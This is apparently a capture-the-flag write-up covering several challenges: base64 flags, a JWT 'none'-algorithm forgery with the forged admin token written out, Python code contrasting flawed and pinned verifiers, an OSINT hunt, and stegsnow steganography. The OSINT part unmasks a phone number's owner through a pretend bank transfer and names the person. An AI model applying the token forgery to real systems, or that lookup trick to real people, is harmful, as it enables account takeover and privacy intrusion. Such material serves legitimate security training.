So, for this part I just followed the link to the Discord channel and I got this base64 string: RG9IQ1RGe3RyeV90b19iZV9oYWNrdGl2ZV9vbl9kaXNjb3JkX2hlaGVoZWhlaGVoZX0K
So, running this command: echo 'RG9IQ1RGe3RyeV90b19iZV9oYWNrdGl2ZV9vbl9kaXNjb3JkX2hlaGVoZWhlaGVoZX0K' | base64 -d, I was able to get the flag "DoHCTF{try_to_be_hacktive_on_discord_hehehehehehe}".
This is really easy and quick: the flag has already been given, which is the name of the challenge, so the flag is "DoHCTF{_colwSPs:(}".
The flag for this is simply "Yes".
Following the link https://diaryofhackers-jwtvuln.chals.io/ink we got to the website.
I got this JWT token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6Imd1ZXN0In0.iJ9U4tIUxxLbbOb_YXVkpvkBqtPsFtAxWIvmcakDfL0
The token has three parts (taking note of the dots) and they are all in Base64, but we are concerned with the first two, which are:
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9 {"alg":"HS256","typ":"JWT"}
eyJ1c2VybmFtZSI6Imd1ZXN0In0 {"username":"guest"}
So what we are going to do now is make some changes, which will look like this:
{"alg":"none","typ":"JWT"}
{"username":"admin"}
Now we base64 encode them back: "eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0=" "eyJ1c2VybmFtZSI6ImFkbWluIn0="
Now that we have the new encoded strings, we join them together with dots, and we also remember the third part of the original token. So the new token will look like this:
"eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0=.eyJ1c2VybmFtZSI6ImFkbWluIn0=.iJ9U4tIUxxLbbOb_YXVkpvkBqtPsFtAxWIvmcakDfL0"
Replace the original token with it using the devtools. Then you get your flag "DoHCTF{jwt_has_a_none_algo_loll}".
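The flaw this challenge relies on, as an added example that is not part of the original writeup or the challenge's own code: a verifier that lets the token header choose the algorithm accepts the modified token above, while a verifier that pins HS256 rejects it. The key, the helper names and both verifier functions are assumptions made for the demo; the challenge server's real code and secret are not on the page.

```python
import base64, hashlib, hmac, json

KEY = b"constructed-demo-key"  # constructed; the real challenge secret is unknown

def b64d(seg):
    # base64url decode that tolerates '=' padding being present or absent
    seg = seg.rstrip("=")
    return base64.urlsafe_b64decode(seg + "=" * (-len(seg) % 4))

def b64e(raw):
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()

def mac_for(head, body, key):
    return hmac.new(key, f"{head}.{body}".encode(), hashlib.sha256).digest()

def sign(header, payload, key=KEY):
    head, body = (b64e(json.dumps(x, separators=(",", ":")).encode())
                  for x in (header, payload))
    return f"{head}.{body}.{b64e(mac_for(head, body, key))}"

def verify_trusting_header(token, key=KEY):
    """Flawed (hypothetical): the token's own header selects the algorithm."""
    head, body, sig = token.split(".")
    alg = json.loads(b64d(head))["alg"]
    if alg.lower() == "none":
        return json.loads(b64d(body))  # signature is never checked
    if alg == "HS256" and hmac.compare_digest(mac_for(head, body, key), b64d(sig)):
        return json.loads(b64d(body))
    raise ValueError("invalid token")

def verify_pinned(token, key=KEY):
    """Hardened (hypothetical): the algorithm is fixed server-side."""
    head, body, sig = token.split(".")  # ValueError unless exactly 3 parts
    if json.loads(b64d(head)).get("alg") != "HS256":
        raise ValueError("unexpected alg")
    if not hmac.compare_digest(mac_for(head, body, key), b64d(sig)):
        raise ValueError("bad signature")
    return json.loads(b64d(body))

# Modified token exactly as it appears in the writeup above
MODIFIED = ("eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0=.eyJ1c2VybmFtZSI6ImFkbWluIn0="
            ".iJ9U4tIUxxLbbOb_YXVkpvkBqtPsFtAxWIvmcakDfL0")
GUEST = sign({"alg": "HS256", "typ": "JWT"}, {"username": "guest"})  # constructed

if __name__ == "__main__":
    print(verify_trusting_header(MODIFIED))  # claims accepted with no signature check
    print(verify_pinned(GUEST))              # genuine HS256 token still verifies
```

Calling verify_pinned(MODIFIED) raises ValueError("unexpected alg") before the payload is ever parsed, which is the behaviour a server should have.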
For this challenge we were provided with a phone number "+2348109439442". We are asked to find someone on LinkedIn whose third name is "Mustapha". After trying several OSINT tools on the phone (I even tried using Truecaller), it did not yield anything. So I opened my bank app and acted as if I wanted to transfer some money to the phone number (Bank to PalmPay). Then I got the person's name, which is "Adebayo Ekeh Mustapha". Then I went to LinkedIn to search for the name.
I got this Base64 from the profile: "RG9IQ1RGe3RoYXRfd2FzX2Vhc3lfcmlnaHQ/X3JpZ2h0P30K". Decoding it, we got the flag "DoHCTF{that_was_easy_right?_right?}".
After downloading the file, I opened it and noticed it had some extra space in it. I searched for what type of steg file it was and found out it is snow steganography, so I used this command to solve it: "stegsnow -C 0cold_flag.txt", and I got the flag "DoHCTF{another_quite_simple_one}".